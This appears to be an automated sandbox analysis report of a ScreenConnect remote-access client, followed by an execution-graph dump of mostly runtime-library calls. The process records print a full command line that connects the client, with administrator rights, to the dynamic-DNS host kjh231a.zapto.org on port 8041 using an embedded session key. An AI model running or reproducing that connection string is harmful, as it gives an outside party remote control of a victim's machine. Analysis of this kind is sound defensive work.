                                                                                                                                                                                                                                                        Start time:13:27:51
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                        Imagebase:0xfe0000
                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                        MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                        Start time:13:27:51
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                        Imagebase:0xfe0000
                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                        MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                        Start time:13:27:53
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User"
                                                                                                                                                                                                                                                        Imagebase:0xe80000
                                                                                                                                                                                                                                                        File size:600'864 bytes
                                                                                                                                                                                                                                                        MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                                          Total number of Nodes:1465
                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                                          execution_graph 5947 b61ff4 5950 b62042 5947->5950 5951 b61fff 5950->5951 5952 b6204b 5950->5952 5952->5951 5953 b623c3 43 API calls 5952->5953 5954 b62086 5953->5954 5955 b623c3 43 API calls 5954->5955 5956 b62091 5955->5956 5957 b63e89 33 API calls 5956->5957 5958 b62099 5957->5958 5748 b63eb5 5749 b63eb8 5748->5749 5750 b63f24 _abort 33 API calls 5749->5750 5751 b63ec4 5750->5751 6590 b67570 6591 b675a9 6590->6591 6592 b647f9 _free 15 API calls 6591->6592 6596 b675d5 _ValidateLocalCookies 6591->6596 6593 b675b2 6592->6593 6594 b6473d _abort 21 API calls 6593->6594 6595 b675bd _ValidateLocalCookies 6594->6595 5959 b68df1 5960 b68e15 5959->5960 5961 b68e2e 5960->5961 5963 b69beb __startOneArgErrorHandling 5960->5963 5964 b68e78 5961->5964 5967 b699d3 5961->5967 5966 b69c2d __startOneArgErrorHandling 5963->5966 5975 b6a1c4 5963->5975 5968 b699f0 DecodePointer 5967->5968 5970 b69a00 5967->5970 5968->5970 5969 b69a8d 5971 b647f9 _free 15 API calls 5969->5971 5972 b69a82 _ValidateLocalCookies 5969->5972 5970->5969 5970->5972 5973 b69a37 5970->5973 5971->5972 5972->5964 5973->5972 5974 b647f9 _free 15 API calls 5973->5974 5974->5972 5976 b6a1fd __startOneArgErrorHandling 5975->5976 5978 b6a224 __startOneArgErrorHandling 5976->5978 5984 b6a495 5976->5984 5979 b6a267 5978->5979 5980 b6a242 5978->5980 5995 b6a786 5979->5995 5988 b6a7b5 5980->5988 5983 b6a262 __startOneArgErrorHandling _ValidateLocalCookies 5983->5966 5985 b6a4c0 __raise_exc 5984->5985 5986 b6a6b9 RaiseException 5985->5986 5987 b6a6d1 5986->5987 5987->5978 5989 b6a7c4 5988->5989 5990 b6a838 __startOneArgErrorHandling 5989->5990 5992 b6a7e3 __startOneArgErrorHandling 5989->5992 5991 b6a786 __startOneArgErrorHandling 15 API calls 5990->5991 5994 b6a831 5991->5994 5993 b6a786 __startOneArgErrorHandling 15 API calls 5992->5993 5992->5994 5993->5994 5994->5983 5996 b6a793 5995->5996 5997 b6a7a8 5995->5997 5999 b6a7ad 5996->5999 6000 b647f9 _free 15 API calls 5996->6000 5998 b647f9 _free 15 API calls 5997->5998 5998->5999 5999->5983 6001 b6a7a0 6000->6001 6001->5983 6126 b6383f 6127 b6384b ___scrt_is_nonwritable_in_current_image 6126->6127 6128 b63882 _abort 6127->6128 6134 b656e2 EnterCriticalSection 6127->6134 6130 b6385f 6131 b667cb __fassign 15 API calls 6130->6131 6132 b6386f 6131->6132 6135 b63888 6132->6135 6134->6130 6138 b6572a LeaveCriticalSection 6135->6138 6137 b6388f 6137->6128 6138->6137 5752 b648bb 5753 b648cb 5752->5753 5762 b648e1 5752->5762 5754 b647f9 _free 15 API calls 5753->5754 5755 b648d0 5754->5755 5756 b6473d _abort 21 API calls 5755->5756 5758 b648da 5756->5758 5759 b6494b 5759->5759 5782 b631ec 5759->5782 5761 b649b9 5763 b64869 _free 15 API calls 5761->5763 5762->5759 5765 b64a2c 5762->5765 5771 b64a4b 5762->5771 5763->5765 5764 b649b0 5764->5761 5768 b64a3e 5764->5768 5788 b679bb 5764->5788 5797 b64c65 5765->5797 5769 b6474d _abort 6 API calls 5768->5769 5770 b64a4a 5769->5770 5772 b64a57 5771->5772 5772->5772 5773 b6480c _abort 15 API calls 5772->5773 5774 b64a85 5773->5774 5775 b679bb 21 API calls 5774->5775 5776 b64ab1 5775->5776 5777 b6474d _abort 6 API calls 5776->5777 5778 b64ae0 _abort 5777->5778 5779 b64b81 FindFirstFileExA 5778->5779 5780 b64bd0 5779->5780 5781 b64a4b 21 API calls 5780->5781 5783 b63201 5782->5783 5784 b631fd 5782->5784 5783->5784 5785 b6480c _abort 15 API calls 5783->5785 5784->5764 5786 b6322f 5785->5786 5787 b64869 _free 15 API calls 5786->5787 5787->5784 5791 b6790a 5788->5791 5789 b6791f 5790 b647f9 _free 15 API calls 5789->5790 5792 b67924 5789->5792 5796 b6794a 5790->5796 5791->5789 5791->5792 5794 b6795b 5791->5794 5792->5764 5793 b6473d _abort 21 API calls 5793->5792 5794->5792 5795 b647f9 _free 15 API calls 5794->5795 5795->5796 5796->5793 5798 b64c6f 5797->5798 5799 b64c7f 5798->5799 5800 b64869 _free 15 API calls 5798->5800 5801 b64869 _free 15 API calls 5799->5801 5800->5798 5802 b64c86 5801->5802 5802->5758 5803 b614bb IsProcessorFeaturePresent 5804 b614d0 5803->5804 5807 b61493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5804->5807 5806 b615b3 5807->5806 6002 b612fb 6007 b61aac SetUnhandledExceptionFilter 6002->6007 6004 b61300 6008 b638f9 6004->6008 6006 b6130b 6007->6004 6009 b63905 6008->6009 6010 b6391f 6008->6010 6009->6010 6011 b647f9 _free 15 API calls 6009->6011 6010->6006 6012 b6390f 6011->6012 6013 b6473d _abort 21 API calls 6012->6013 6014 b6391a 6013->6014 6014->6006 5808 b61ab8 5809 b61aef 5808->5809 5810 b61aca 5808->5810 5810->5809 5817 b6209a 5810->5817 5829 b623c3 5817->5829 5820 b620a3 5821 b623c3 43 API calls 5820->5821 5822 b61b06 5821->5822 5823 b63e89 5822->5823 5824 b63e95 _abort 5823->5824 5825 b64424 _abort 33 API calls 5824->5825 5828 b63e9a 5825->5828 5826 b63f24 _abort 33 API calls 5827 b63ec4 5826->5827 5828->5826 5843 b623d1 5829->5843 5831 b623c8 5832 b61afc 5831->5832 5833 b66b14 _abort 2 API calls 5831->5833 5832->5820 5835 b63f29 5833->5835 5834 b63f35 5837 b63f3e IsProcessorFeaturePresent 5834->5837 5838 b63f5c 5834->5838 5835->5834 5836 b66b6f _abort 33 API calls 5835->5836 5836->5834 5839 b63f49 5837->5839 5840 b63793 _abort 23 API calls 5838->5840 5841 b64573 _abort 3 API calls 5839->5841 5842 b63f66 5840->5842 5841->5838 5844 b623dd GetLastError 5843->5844 5845 b623da 5843->5845 5855 b626a4 5844->5855 5845->5831 5848 b62457 SetLastError 5848->5831 5849 b626df ___vcrt_FlsSetValue 6 API calls 5850 b6240b 5849->5850 5851 b62433 5850->5851 5852 b626df ___vcrt_FlsSetValue 6 API calls 5850->5852 5854 b62411 5850->5854 5853 b626df ___vcrt_FlsSetValue 6 API calls 5851->5853 5851->5854 5852->5851 5853->5854 5854->5848 5856 b62543 ___vcrt_FlsFree 5 API calls 5855->5856 5857 b626be 5856->5857 5858 b626d6 TlsGetValue 5857->5858 5859 b623f2 5857->5859 5858->5859 5859->5848 5859->5849 5859->5854 5860 b65ba6 5861 b65bd7 5860->5861 5863 b65bb1 5860->5863 5862 b65bc1 FreeLibrary 5862->5863 5863->5861 5863->5862 6139 b66026 6140 b6602b 6139->6140 6142 b6604e 6140->6142 6143 b65c56 6140->6143 6144 b65c63 6143->6144 6145 b65c85 6143->6145 6146 b65c71 DeleteCriticalSection 6144->6146 6147 b65c7f 6144->6147 6145->6140 6146->6146 6146->6147 6148 b64869 _free 15 API calls 6147->6148 6148->6145 6015 b633e5 6016 b633f7 6015->6016 6017 b633fd 6015->6017 6019 b63376 6016->6019 6020 b633a0 6019->6020 6021 b63383 6019->6021 6020->6017 6022 b6339a 6021->6022 6024 b64869 _free 15 API calls 6021->6024 6023 b64869 _free 15 API calls 6022->6023 6023->6020 6024->6021 6597 b69160 6600 b6917e 6597->6600 6599 b69176 6604 b69183 6600->6604 6601 b699d3 16 API calls 6602 b693af 6601->6602 6602->6599 6603 b69218 6603->6599 6604->6601 6604->6603 5864 b656a1 5865 b656ac 5864->5865 5867 b656d5 5865->5867 5868 b656d1 5865->5868 5870 b659b3 5865->5870 5875 b656f9 5867->5875 5871 b65741 _abort 5 API calls 5870->5871 5872 b659da 5871->5872 5873 b659f8 InitializeCriticalSectionAndSpinCount 5872->5873 5874 b659e3 _ValidateLocalCookies 5872->5874 5873->5874 5874->5865 5876 b65706 5875->5876 5878 b65725 5875->5878 5877 b65710 DeleteCriticalSection 5876->5877 5877->5877 5877->5878 5878->5868 6025 b68ce1 6026 b68d01 6025->6026 6029 b68d38 6026->6029 6028 b68d2b 6030 b68d3f 6029->6030 6031 b68da0 6030->6031 6032 b68d5f 6030->6032 6034 b6988e 6031->6034 6038 b69997 6031->6038 6032->6034 6036 b69997 16 API calls 6032->6036 6034->6028 6037 b698be 6036->6037 6037->6028 6039 b699a0 6038->6039 6042 b6a06f 6039->6042 6041 b68dee 6041->6028 6043 b6a0ae __startOneArgErrorHandling 6042->6043 6046 b6a130 __startOneArgErrorHandling 6043->6046 6048 b6a472 6043->6048 6045 b6a786 __startOneArgErrorHandling 15 API calls 6047 b6a166 _ValidateLocalCookies 6045->6047 6046->6045 6046->6047 6047->6041 6049 b6a495 __raise_exc RaiseException 6048->6049 6050 b6a490 6049->6050 6050->6046 6149 b6142e 6152 b62cf0 6149->6152 6151 b6143f 6153 b644a8 _abort 15 API calls 6152->6153 6154 b62d07 _ValidateLocalCookies 6153->6154 6154->6151 6155 b6452d 6163 b65858 6155->6163 6157 b64537 6158 b644a8 _abort 15 API calls 6157->6158 6162 b64541 6157->6162 6159 b64549 6158->6159 6160 b64556 6159->6160 6168 b64559 6159->6168 6164 b65741 _abort 5 API calls 6163->6164 6165 b6587f 6164->6165 6166 b65897 TlsAlloc 6165->6166 6167 b65888 _ValidateLocalCookies 6165->6167 6166->6167 6167->6157 6169 b64563 6168->6169 6170 b64569 6168->6170 6172 b658ae 6169->6172 6170->6162 6173 b65741 _abort 5 API calls 6172->6173 6174 b658d5 6173->6174 6175 b658ed TlsFree 6174->6175 6176 b658e1 _ValidateLocalCookies 6174->6176 6175->6176 6176->6170 6051 b69beb 6052 b69c04 __startOneArgErrorHandling 6051->6052 6053 b6a1c4 16 API calls 6052->6053 6054 b69c2d __startOneArgErrorHandling 6052->6054 6053->6054 5879 b66893 GetProcessHeap 6605 b62f53 6606 b62f62 6605->6606 6607 b62f7e 6605->6607 6606->6607 6608 b62f68 6606->6608 6609 b6522b 46 API calls 6607->6609 6610 b647f9 _free 15 API calls 6608->6610 6611 b62f85 GetModuleFileNameA 6609->6611 6613 b62f6d 6610->6613 6612 b62fa9 6611->6612 6628 b63077 6612->6628 6614 b6473d _abort 21 API calls 6613->6614 6616 b62f77 6614->6616 6618 b631ec 15 API calls 6619 b62fd3 6618->6619 6620 b62fdc 6619->6620 6621 b62fe8 6619->6621 6622 b647f9 _free 15 API calls 6620->6622 6623 b63077 33 API calls 6621->6623 6627 b62fe1 6622->6627 6624 b62ffe 6623->6624 6626 b64869 _free 15 API calls 6624->6626 6624->6627 6625 b64869 _free 15 API calls 6625->6616 6626->6627 6627->6625 6630 b6309c 6628->6630 6629 b655b6 33 API calls 6629->6630 6630->6629 6632 b630fc 6630->6632 6631 b62fc6 6631->6618 6632->6631 6633 b655b6 33 API calls 6632->6633 6633->6632 6055 b65fd0 6056 b65fdc ___scrt_is_nonwritable_in_current_image 6055->6056 6067 b656e2 EnterCriticalSection 6056->6067 6058 b65fe3 6068 b65c8b 6058->6068 6060 b65ff2 6066 b66001 6060->6066 6081 b65e64 GetStartupInfoW 6060->6081 6063 b66012 _abort 6092 b6601d 6066->6092 6067->6058 6069 b65c97 ___scrt_is_nonwritable_in_current_image 6068->6069 6070 b65ca4 6069->6070 6071 b65cbb 6069->6071 6072 b647f9 _free 15 API calls 6070->6072 6095 b656e2 EnterCriticalSection 6071->6095 6074 b65ca9 6072->6074 6076 b6473d _abort 21 API calls 6074->6076 6075 b65cc7 6080 b65cf3 6075->6080 6096 b65bdc 6075->6096 6078 b65cb3 _abort 6076->6078 6078->6060 6103 b65d1a 6080->6103 6082 b65f13 6081->6082 6083 b65e81 6081->6083 6087 b65f1a 6082->6087 6083->6082 6084 b65c8b 22 API calls 6083->6084 6085 b65eaa 6084->6085 6085->6082 6086 b65ed8 GetFileType 6085->6086 6086->6085 6091 b65f21 6087->6091 6088 b65f64 GetStdHandle 6088->6091 6089 b65fcc 6089->6066 6090 b65f77 GetFileType 6090->6091 6091->6088 6091->6089 6091->6090 6107 b6572a LeaveCriticalSection 6092->6107 6094 b66024 6094->6063 6095->6075 6097 b6480c _abort 15 API calls 6096->6097 6099 b65bee 6097->6099 6098 b65bfb 6100 b64869 _free 15 API calls 6098->6100 6099->6098 6101 b659b3 6 API calls 6099->6101 6102 b65c4d 6100->6102 6101->6099 6102->6075 6106 b6572a LeaveCriticalSection 6103->6106 6105 b65d21 6105->6078 6106->6105 6107->6094 6177 b67a10 6180 b67a27 6177->6180 6181 b67a35 6180->6181 6182 b67a49 6180->6182 6183 b647f9 _free 15 API calls 6181->6183 6184 b67a63 6182->6184 6185 b67a51 6182->6185 6186 b67a3a 6183->6186 6188 b63f72 __fassign 33 API calls 6184->6188 6191 b67a22 6184->6191 6187 b647f9 _free 15 API calls 6185->6187 6189 b6473d _abort 21 API calls 6186->6189 6190 b67a56 6187->6190 6188->6191 6189->6191 6192 b6473d _abort 21 API calls 6190->6192 6192->6191 6634 b67351 6635 b6735e 6634->6635 6636 b6480c _abort 15 API calls 6635->6636 6637 b67378 6636->6637 6638 b64869 _free 15 API calls 6637->6638 6639 b67384 6638->6639 6640 b6480c _abort 15 API calls 6639->6640 6643 b673aa 6639->6643 6642 b6739e 6640->6642 6641 b659b3 6 API calls 6641->6643 6644 b64869 _free 15 API calls 6642->6644 6643->6641 6645 b673b6 6643->6645 6644->6643 6193 b67d1c 6194 b6522b 46 API calls 6193->6194 6195 b67d21 6194->6195 6646 b6365d 6647 b63e89 33 API calls 6646->6647 6648 b63665 6647->6648 6196 b67419 6206 b67fb2 6196->6206 6200 b67426 6219 b6828e 6200->6219 6203 b67450 6204 b64869 _free 15 API calls 6203->6204 6205 b6745b 6204->6205 6223 b67fbb 6206->6223 6208 b67421 6209 b681ee 6208->6209 6210 b681fa ___scrt_is_nonwritable_in_current_image 6209->6210 6243 b656e2 EnterCriticalSection 6210->6243 6212 b68270 6257 b68285 6212->6257 6214 b68205 6214->6212 6216 b68244 DeleteCriticalSection 6214->6216 6244 b6901c 6214->6244 6215 b6827c _abort 6215->6200 6218 b64869 _free 15 API calls 6216->6218 6218->6214 6220 b682a4 6219->6220 6222 b67435 DeleteCriticalSection 6219->6222 6221 b64869 _free 15 API calls 6220->6221 6220->6222 6221->6222 6222->6200 6222->6203 6224 b67fc7 ___scrt_is_nonwritable_in_current_image 6223->6224 6233 b656e2 EnterCriticalSection 6224->6233 6226 b6806a 6238 b6808a 6226->6238 6230 b68076 _abort 6230->6208 6231 b67f6b 61 API calls 6232 b67fd6 6231->6232 6232->6226 6232->6231 6234 b67465 EnterCriticalSection 6232->6234 6235 b68060 6232->6235 6233->6232 6234->6232 6241 b67479 LeaveCriticalSection 6235->6241 6237 b68068 6237->6232 6242 b6572a LeaveCriticalSection 6238->6242 6240 b68091 6240->6230 6241->6237 6242->6240 6243->6214 6245 b69028 ___scrt_is_nonwritable_in_current_image 6244->6245 6246 b6904e 6245->6246 6247 b69039 6245->6247 6254 b69049 _abort 6246->6254 6260 b67465 EnterCriticalSection 6246->6260 6248 b647f9 _free 15 API calls 6247->6248 6249 b6903e 6248->6249 6251 b6473d _abort 21 API calls 6249->6251 6251->6254 6252 b6906a 6261 b68fa6 6252->6261 6254->6214 6255 b69075 6277 b69092 6255->6277 6515 b6572a LeaveCriticalSection 6257->6515 6259 b6828c 6259->6215 6260->6252 6262 b68fb3 6261->6262 6263 b68fc8 6261->6263 6264 b647f9 _free 15 API calls 6262->6264 6275 b68fc3 6263->6275 6280 b67f05 6263->6280 6265 b68fb8 6264->6265 6267 b6473d _abort 21 API calls 6265->6267 6267->6275 6269 b6828e 15 API calls 6270 b68fe4 6269->6270 6286 b6732b 6270->6286 6272 b68fea 6293 b69d4e 6272->6293 6275->6255 6276 b64869 _free 15 API calls 6276->6275 6514 b67479 LeaveCriticalSection 6277->6514 6279 b6909a 6279->6254 6281 b67f1d 6280->6281 6282 b67f19 6280->6282 6281->6282 6283 b6732b 21 API calls 6281->6283 6282->6269 6284 b67f3d 6283->6284 6308 b689a7 6284->6308 6287 b67337 6286->6287 6288 b6734c 6286->6288 6289 b647f9 _free 15 API calls 6287->6289 6288->6272 6290 b6733c 6289->6290 6291 b6473d _abort 21 API calls 6290->6291 6292 b67347 6291->6292 6292->6272 6294 b69d72 6293->6294 6295 b69d5d 6293->6295 6297 b69dad 6294->6297 6302 b69d99 6294->6302 6296 b647e6 __dosmaperr 15 API calls 6295->6296 6299 b69d62 6296->6299 6298 b647e6 __dosmaperr 15 API calls 6297->6298 6300 b69db2 6298->6300 6301 b647f9 _free 15 API calls 6299->6301 6303 b647f9 _free 15 API calls 6300->6303 6305 b68ff0 6301->6305 6471 b69d26 6302->6471 6306 b69dba 6303->6306 6305->6275 6305->6276 6307 b6473d _abort 21 API calls 6306->6307 6307->6305 6309 b689b3 ___scrt_is_nonwritable_in_current_image 6308->6309 6310 b689bb 6309->6310 6312 b689d3 6309->6312 6333 b647e6 6310->6333 6311 b68a71 6315 b647e6 __dosmaperr 15 API calls 6311->6315 6312->6311 6318 b68a08 6312->6318 6317 b68a76 6315->6317 6316 b647f9 _free 15 API calls 6327 b689c8 _abort 6316->6327 6319 b647f9 _free 15 API calls 6317->6319 6336 b65d23 EnterCriticalSection 6318->6336 6321 b68a7e 6319->6321 6323 b6473d _abort 21 API calls 6321->6323 6322 b68a0e 6324 b68a3f 6322->6324 6325 b68a2a 6322->6325 6323->6327 6337 b68a92 6324->6337 6326 b647f9 _free 15 API calls 6325->6326 6330 b68a2f 6326->6330 6327->6282 6329 b68a3a 6386 b68a69 6329->6386 6331 b647e6 __dosmaperr 15 API calls 6330->6331 6331->6329 6334 b644a8 _abort 15 API calls 6333->6334 6335 b647eb 6334->6335 6335->6316 6336->6322 6338 b68ac0 6337->6338 6365 b68ab9 _ValidateLocalCookies 6337->6365 6339 b68ac4 6338->6339 6340 b68ae3 6338->6340 6341 b647e6 __dosmaperr 15 API calls 6339->6341 6342 b68b34 6340->6342 6343 b68b17 6340->6343 6344 b68ac9 6341->6344 6346 b68b4a 6342->6346 6389 b68f8b 6342->6389 6345 b647e6 __dosmaperr 15 API calls 6343->6345 6347 b647f9 _free 15 API calls 6344->6347 6348 b68b1c 6345->6348 6392 b68637 6346->6392 6350 b68ad0 6347->6350 6352 b647f9 _free 15 API calls 6348->6352 6353 b6473d _abort 21 API calls 6350->6353 6357 b68b24 6352->6357 6353->6365 6355 b68b91 6361 b68ba5 6355->6361 6362 b68beb WriteFile 6355->6362 6356 b68b58 6358 b68b7e 6356->6358 6359 b68b5c 6356->6359 6360 b6473d _abort 21 API calls 6357->6360 6404 b68417 GetConsoleCP 6358->6404 6363 b68c52 6359->6363 6399 b685ca 6359->6399 6360->6365 6367 b68bad 6361->6367 6368 b68bdb 6361->6368 6366 b68c0e GetLastError 6362->6366 6371 b68b74 6362->6371 6363->6365 6375 b647f9 _free 15 API calls 6363->6375 6365->6329 6366->6371 6372 b68bb2 6367->6372 6373 b68bcb 6367->6373 6424 b686ad 6368->6424 6371->6363 6371->6365 6377 b68c2e 6371->6377 6372->6363 6413 b6878c 6372->6413 6418 b6887a 6373->6418 6376 b68c77 6375->6376 6379 b647e6 __dosmaperr 15 API calls 6376->6379 6380 b68c35 6377->6380 6381 b68c49 6377->6381 6379->6365 6383 b647f9 _free 15 API calls 6380->6383 6429 b647c3 6381->6429 6384 b68c3a 6383->6384 6385 b647e6 __dosmaperr 15 API calls 6384->6385 6385->6365 6470 b65d46 LeaveCriticalSection 6386->6470 6388 b68a6f 6388->6327 6434 b68f0d 6389->6434 6456 b67eaf 6392->6456 6394 b68647 6395 b6864c 6394->6395 6396 b64424 _abort 33 API calls 6394->6396 6395->6355 6395->6356 6397 b6866f 6396->6397 6397->6395 6398 b6868d GetConsoleMode 6397->6398 6398->6395 6401 b685ef 6399->6401 6402 b68624 6399->6402 6400 b68626 GetLastError 6400->6402 6401->6400 6401->6402 6403 b69101 WriteConsoleW CreateFileW 6401->6403 6402->6371 6403->6401 6405 b6858c _ValidateLocalCookies 6404->6405 6411 b6847a 6404->6411 6405->6371 6407 b672b7 35 API calls __fassign 6407->6411 6408 b68500 WideCharToMultiByte 6408->6405 6409 b68526 WriteFile 6408->6409 6410 b685af GetLastError 6409->6410 6409->6411 6410->6405 6411->6405 6411->6407 6411->6408 6412 b68557 WriteFile 6411->6412 6465 b66052 6411->6465 6412->6410 6412->6411 6414 b6879b 6413->6414 6415 b6885d _ValidateLocalCookies 6414->6415 6416 b68819 WriteFile 6414->6416 6415->6371 6416->6414 6417 b6885f GetLastError 6416->6417 6417->6415 6423 b68889 6418->6423 6419 b68994 _ValidateLocalCookies 6419->6371 6420 b6890b WideCharToMultiByte 6421 b68940 WriteFile 6420->6421 6422 b6898c GetLastError 6420->6422 6421->6422 6421->6423 6422->6419 6423->6419 6423->6420 6423->6421 6426 b686bc 6424->6426 6425 b6872e WriteFile 6425->6426 6427 b68771 GetLastError 6425->6427 6426->6425 6428 b6876f _ValidateLocalCookies 6426->6428 6427->6428 6428->6371 6430 b647e6 __dosmaperr 15 API calls 6429->6430 6431 b647ce _free 6430->6431 6432 b647f9 _free 15 API calls 6431->6432 6433 b647e1 6432->6433 6433->6365 6443 b65dfa 6434->6443 6436 b68f1f 6437 b68f27 6436->6437 6438 b68f38 SetFilePointerEx 6436->6438 6440 b647f9 _free 15 API calls 6437->6440 6439 b68f50 GetLastError 6438->6439 6442 b68f2c 6438->6442 6441 b647c3 __dosmaperr 15 API calls 6439->6441 6440->6442 6441->6442 6442->6346 6444 b65e07 6443->6444 6445 b65e1c 6443->6445 6446 b647e6 __dosmaperr 15 API calls 6444->6446 6448 b647e6 __dosmaperr 15 API calls 6445->6448 6450 b65e41 6445->6450 6447 b65e0c 6446->6447 6449 b647f9 _free 15 API calls 6447->6449 6451 b65e4c 6448->6451 6452 b65e14 6449->6452 6450->6436 6453 b647f9 _free 15 API calls 6451->6453 6452->6436 6454 b65e54 6453->6454 6455 b6473d _abort 21 API calls 6454->6455 6455->6452 6457 b67ebc 6456->6457 6458 b67ec9 6456->6458 6459 b647f9 _free 15 API calls 6457->6459 6461 b67ed5 6458->6461 6462 b647f9 _free 15 API calls 6458->6462 6460 b67ec1 6459->6460 6460->6394 6461->6394 6463 b67ef6 6462->6463 6464 b6473d _abort 21 API calls 6463->6464 6464->6460 6466 b64424 _abort 33 API calls 6465->6466 6467 b6605d 6466->6467 6468 b672d1 __fassign 33 API calls 6467->6468 6469 b6606d 6468->6469 6469->6411 6470->6388 6474 b69ca4 6471->6474 6473 b69d4a 6473->6305 6475 b69cb0 ___scrt_is_nonwritable_in_current_image 6474->6475 6485 b65d23 EnterCriticalSection 6475->6485 6477 b69cbe 6478 b69ce5 6477->6478 6479 b69cf0 6477->6479 6486 b69dcd 6478->6486 6481 b647f9 _free 15 API calls 6479->6481 6482 b69ceb 6481->6482 6501 b69d1a 6482->6501 6484 b69d0d _abort 6484->6473 6485->6477 6487 b65dfa 21 API calls 6486->6487 6490 b69ddd 6487->6490 6488 b69de3 6504 b65d69 6488->6504 6490->6488 6491 b69e15 6490->6491 6493 b65dfa 21 API calls 6490->6493 6491->6488 6494 b65dfa 21 API calls 6491->6494 6496 b69e0c 6493->6496 6497 b69e21 CloseHandle 6494->6497 6495 b69e5d 6495->6482 6500 b65dfa 21 API calls 6496->6500 6497->6488 6498 b69e2d GetLastError 6497->6498 6498->6488 6499 b647c3 __dosmaperr 15 API calls 6499->6495 6500->6491 6513 b65d46 LeaveCriticalSection 6501->6513 6503 b69d24 6503->6484 6505 b65ddf 6504->6505 6506 b65d78 6504->6506 6507 b647f9 _free 15 API calls 6505->6507 6506->6505 6511 b65da2 6506->6511 6508 b65de4 6507->6508 6509 b647e6 __dosmaperr 15 API calls 6508->6509 6510 b65dcf 6509->6510 6510->6495 6510->6499 6511->6510 6512 b65dc9 SetStdHandle 6511->6512 6512->6510 6513->6503 